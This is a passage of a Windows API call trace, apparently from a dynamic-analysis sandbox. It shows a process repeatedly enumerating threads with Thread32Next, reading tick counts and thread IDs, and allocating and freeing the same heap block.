(HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.633] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.634] GetTickCount () returned 0x115977f [0168.634] GetCurrentThreadId () returned 0x324 [0168.634] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.634] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.634] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.635] GetTickCount () returned 0x115977f [0168.635] GetCurrentThreadId () returned 0x324 [0168.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.635] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.636] GetTickCount () returned 0x115977f [0168.636] GetCurrentThreadId () returned 0x324 [0168.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.636] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.637] GetTickCount () returned 0x115977f [0168.637] GetCurrentThreadId () returned 0x324 [0168.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.637] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.637] GetTickCount () returned 0x115977f [0168.637] GetCurrentThreadId () returned 0x324 [0168.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.638] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.638] GetTickCount () returned 0x115977f [0168.638] GetCurrentThreadId () returned 0x324 [0168.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.638] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.640] GetTickCount () returned 0x115978f [0168.640] GetCurrentThreadId () returned 0x324 [0168.640] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.640] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.641] GetTickCount () returned 0x115978f [0168.641] GetCurrentThreadId () returned 0x324 [0168.641] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.641] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.642] GetTickCount () returned 0x115978f [0168.642] GetCurrentThreadId () returned 0x324 [0168.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.642] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.642] GetTickCount () returned 0x115978f [0168.642] GetCurrentThreadId () returned 0x324 [0168.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.642] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.643] GetTickCount () returned 0x115978f [0168.643] GetCurrentThreadId () returned 0x324 [0168.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.643] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.644] GetTickCount () returned 0x115978f [0168.644] GetCurrentThreadId () returned 0x324 [0168.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.644] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.645] GetTickCount () returned 0x115978f [0168.645] GetCurrentThreadId () returned 0x324 [0168.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.645] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.646] GetTickCount () returned 0x115978f [0168.646] GetCurrentThreadId () returned 0x324 [0168.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.646] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.647] GetTickCount () returned 0x115978f [0168.647] GetCurrentThreadId () returned 0x324 [0168.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.647] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.647] GetTickCount () returned 0x115978f [0168.647] GetCurrentThreadId () returned 0x324 [0168.647] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.647] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.647] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.648] GetTickCount () returned 0x115978f [0168.648] GetCurrentThreadId () returned 0x324 [0168.648] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.648] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.648] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.649] GetTickCount () returned 0x115978f [0168.649] GetCurrentThreadId () returned 0x324 [0168.649] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.649] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.649] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.650] GetTickCount () returned 0x115978f [0168.650] GetCurrentThreadId () returned 0x324 [0168.650] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.650] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.650] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.651] GetTickCount () returned 0x115978f [0168.651] GetCurrentThreadId () returned 0x324 [0168.651] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.651] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.651] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.652] GetTickCount () returned 0x115978f [0168.652] GetCurrentThreadId () returned 0x324 [0168.652] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.652] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.652] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.653] GetTickCount () returned 0x115978f [0168.653] GetCurrentThreadId () returned 0x324 [0168.653] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.653] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.653] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.654] GetTickCount () returned 0x115978f [0168.654] GetCurrentThreadId () returned 0x324 [0168.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.654] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.655] GetTickCount () returned 0x115978f [0168.655] GetCurrentThreadId () returned 0x324 [0168.655] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.657] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.658] GetTickCount () returned 0x115979e [0168.658] GetCurrentThreadId () returned 0x324 [0168.658] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.658] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.659] GetTickCount () returned 0x115979e [0168.659] GetCurrentThreadId () returned 0x324 [0168.659] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.659] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.659] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.660] GetTickCount () returned 0x115979e [0168.660] GetCurrentThreadId () returned 0x324 [0168.660] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.660] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.660] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.661] GetTickCount () returned 0x115979e [0168.661] GetCurrentThreadId () returned 0x324 [0168.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.661] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.661] GetTickCount () returned 0x115979e [0168.661] GetCurrentThreadId () returned 0x324 [0168.661] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.661] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.662] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.662] GetTickCount () returned 0x115979e [0168.662] GetCurrentThreadId () returned 0x324 [0168.662] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.662] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.662] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.663] GetTickCount () returned 0x115979e [0168.663] GetCurrentThreadId () returned 0x324 [0168.663] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.663] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.663] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.664] GetTickCount () returned 0x115979e [0168.664] GetCurrentThreadId () returned 0x324 [0168.664] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.664] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.664] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.665] GetTickCount () returned 0x115979e [0168.665] GetCurrentThreadId () returned 0x324 [0168.665] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.665] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.665] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.666] GetTickCount () returned 0x115979e [0168.666] GetCurrentThreadId () returned 0x324 [0168.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.666] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.666] GetTickCount () returned 0x115979e [0168.666] GetCurrentThreadId () returned 0x324 [0168.666] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.666] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.667] GetTickCount () returned 0x115979e [0168.667] GetCurrentThreadId () returned 0x324 [0168.667] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.667] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.668] GetTickCount () returned 0x115979e [0168.668] GetCurrentThreadId () returned 0x324 [0168.668] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.668] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.669] GetTickCount () returned 0x115979e [0168.669] GetCurrentThreadId () returned 0x324 [0168.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.669] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.669] GetTickCount () returned 0x115979e [0168.670] GetCurrentThreadId () returned 0x324 [0168.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.670] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.670] GetTickCount () returned 0x11597ae [0168.670] GetCurrentThreadId () returned 0x324 [0168.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.670] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.671] GetTickCount () returned 0x11597ae [0168.671] GetCurrentThreadId () returned 0x324 [0168.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.671] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.672] GetTickCount () returned 0x11597ae [0168.672] GetCurrentThreadId () returned 0x324 [0168.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.672] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.673] GetTickCount () returned 0x11597ae [0168.673] GetCurrentThreadId () returned 0x324 [0168.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.673] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.673] GetTickCount () returned 0x11597ae [0168.673] GetCurrentThreadId () returned 0x324 [0168.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.674] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.674] GetTickCount () returned 0x11597ae [0168.674] GetCurrentThreadId () returned 0x324 [0168.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.674] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.675] GetTickCount () returned 0x11597ae [0168.675] GetCurrentThreadId () returned 0x324 [0168.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.675] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.676] GetTickCount () returned 0x11597ae [0168.676] GetCurrentThreadId () returned 0x324 [0168.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.676] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.677] GetTickCount () returned 0x11597ae [0168.677] GetCurrentThreadId () returned 0x324 [0168.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.677] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.678] GetTickCount () returned 0x11597ae [0168.678] GetCurrentThreadId () returned 0x324 [0168.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.678] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.678] GetTickCount () returned 0x11597ae [0168.679] GetCurrentThreadId () returned 0x324 [0168.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.679] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.679] GetTickCount () returned 0x11597ae [0168.679] GetCurrentThreadId () returned 0x324 [0168.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.679] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.680] GetTickCount () returned 0x11597ae [0168.680] GetCurrentThreadId () returned 0x324 [0168.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.680] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.681] GetTickCount () returned 0x11597ae [0168.681] GetCurrentThreadId () returned 0x324 [0168.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.681] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.682] GetTickCount () returned 0x11597ae [0168.682] GetCurrentThreadId () returned 0x324 [0168.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.682] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.682] GetTickCount () returned 0x11597ae [0168.682] GetCurrentThreadId () returned 0x324 [0168.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.683] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.683] GetTickCount () returned 0x11597ae [0168.683] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.684] GetTickCount () returned 0x11597ae [0168.684] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.685] GetTickCount () returned 0x11597ae [0168.685] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.686] GetTickCount () returned 0x11597ae [0168.686] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.687] GetTickCount () returned 0x11597be [0168.687] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.688] GetTickCount () returned 0x11597be [0168.688] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.689] GetTickCount () returned 0x11597be [0168.689] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.690] GetTickCount () returned 0x11597be [0168.690] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.690] GetTickCount () returned 0x11597be [0168.690] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.691] GetTickCount () returned 0x11597be [0168.691] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.692] GetTickCount () returned 0x11597be [0168.692] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.692] GetTickCount () returned 0x11597be [0168.692] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.693] GetTickCount () returned 0x11597be [0168.693] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.694] GetTickCount () returned 0x11597be [0168.694] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.694] GetTickCount () returned 0x11597be [0168.694] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.695] GetTickCount () returned 0x11597be [0168.695] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.696] GetTickCount () returned 0x11597be [0168.696] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.696] GetTickCount () returned 0x11597be [0168.696] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.697] GetTickCount () returned 0x11597be [0168.697] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.698] GetTickCount () returned 0x11597be [0168.698] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.698] GetTickCount () returned 0x11597be [0168.699] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.699] GetTickCount () returned 0x11597be [0168.699] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.700] GetTickCount () returned 0x11597be [0168.700] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.701] GetTickCount () returned 0x11597be [0168.701] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.701] GetTickCount () returned 0x11597be [0168.701] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.702] GetTickCount () returned 0x11597cd [0168.702] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.703] GetTickCount () returned 0x11597cd [0168.703] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.703] GetTickCount () returned 0x11597cd [0168.704] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.704] GetTickCount () returned 0x11597cd [0168.704] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.705] GetTickCount () returned 0x11597cd [0168.705] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.706] GetTickCount () returned 0x11597cd [0168.706] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.707] GetTickCount () returned 0x11597cd [0168.707] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.708] GetTickCount () returned 0x11597cd [0168.708] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.709] GetTickCount () returned 0x11597cd [0168.709] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.710] GetTickCount () returned 0x11597cd [0168.710] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.711] GetTickCount () returned 0x11597cd [0168.711] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.712] GetTickCount () returned 0x11597cd [0168.712] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.713] GetTickCount () returned 0x11597cd [0168.713] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.714] GetTickCount () returned 0x11597cd [0168.714] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.715] GetTickCount () returned 0x11597cd [0168.715] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.716] GetTickCount () returned 0x11597cd [0168.716] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.717] GetTickCount () returned 0x11597cd [0168.717] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.718] GetTickCount () returned 0x11597dd [0168.718] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.719] GetTickCount () returned 0x11597dd [0168.719] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.720] GetTickCount () returned 0x11597dd [0168.720] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.720] GetTickCount () returned 0x11597dd [0168.720] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.721] GetTickCount () returned 0x11597dd [0168.721] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.722] GetTickCount () returned 0x11597dd [0168.722] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.723] GetTickCount () returned 0x11597dd [0168.723] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.724] GetTickCount () returned 0x11597dd [0168.724] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.725] GetTickCount () returned 0x11597dd [0168.725] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.726] GetTickCount () returned 0x11597dd [0168.726] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.728] GetTickCount () returned 0x11597dd [0168.728] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.729] GetTickCount () returned 0x11597dd [0168.729] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.730] 